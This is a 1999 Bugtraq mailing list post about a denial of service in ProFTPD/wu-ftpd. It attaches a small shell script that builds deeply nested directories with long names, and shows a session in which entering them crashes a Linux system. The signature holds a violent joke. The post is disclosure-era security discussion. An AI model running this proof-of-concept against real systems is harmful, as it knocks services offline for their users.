Bugtraq mailing list archives

Re: Pro/wuFTPD DoS

From: Ultor () SOWATECH COM PL (Ultor)
Date: Sat, 13 Feb 1999 19:18:15 +0100


To jest wieloczêciowa wiadomoæ w formacie MIME.

------=_NextPart_000_01BE5785.9ACDD480
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

Hi

yes,
=20
kills patched ProFTPD dead.
=20
-----snip-----
=20
#!/usr/local/bin/perl
# ftpd thingy
# bubba () bubba org


[CUTED]
=20

-----snip-----

Ken Williams
jkwilli2 () csc ncsu edu



Hmmm i think that the problem here isn't overflow in ProFTPD.
Here is a proof.

first run attached 'sux' to make directories ...

----- snip -------
# pwd
/mnt/
# ./sux
    ok now just cd that directories
# cd A*
[CUTED]
# cd A*
ultor:/mnt/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# cd A*


Welcome to Linux 2.0.35.

ultor login:

----- snip -------=20

nice heh :)


Greeetz

-------------------------------------------------------------
 "I hack the heads off little girls and put them on my wall"
  ULT0R [Ultor () sowatech com pl] - NETWORK SECURITY ADVISER
------=_NextPart_000_01BE5785.9ACDD480
Content-Type: application/octet-stream; name="sux"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment; filename="sux"

#!/bin/sh
#
# stupid thing which shows overflows in some toolz
#
# Contact: ultor () sowatech com pl

STRING=3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAA

i=3D0

while [ $i -le 15 ]
do=20
  i=3D`expr $i + 1`
  mkdir $STRING
  cd $STRING
  echo DIR MADE $i
done
echo NOW JUST DO $ cd XXXXXX* UNTIL IT CRASH

------=_NextPart_000_01BE5785.9ACDD480--

Current thread:

Re: Pro/wuFTPD DoS Ultor (Feb 13)
- <Possible follow-ups>
- Re: Pro/wuFTPD DoS ga (Feb 15)
  - Re: Pro/wuFTPD DoS CyberPsychotic (Feb 17)
- Re: Pro/wuFTPD DoS CyberPsychotic (Feb 19)
  - Re: Pro/wuFTPD DoS Chris Wedgwood (Feb 20)
    - Process table attack (from RISKS Digest) Mark Boolootian (Feb 20)
    - LSOF exploit c0nd0r (Feb 21)
    - Re: Process table attack (from RISKS Digest) Olle Segerdahl,D (Feb 22)
    - Re: Process table attack (from RISKS Digest) Jan B. Koum (Feb 22)
    - ANNOUNCE: Net::RawIP 0.06 has been released Sergey V. Kolychev (Feb 22)
    - Summary: Copyright on Security advisories Aviram Jenik (Feb 22)

(Thread continues...)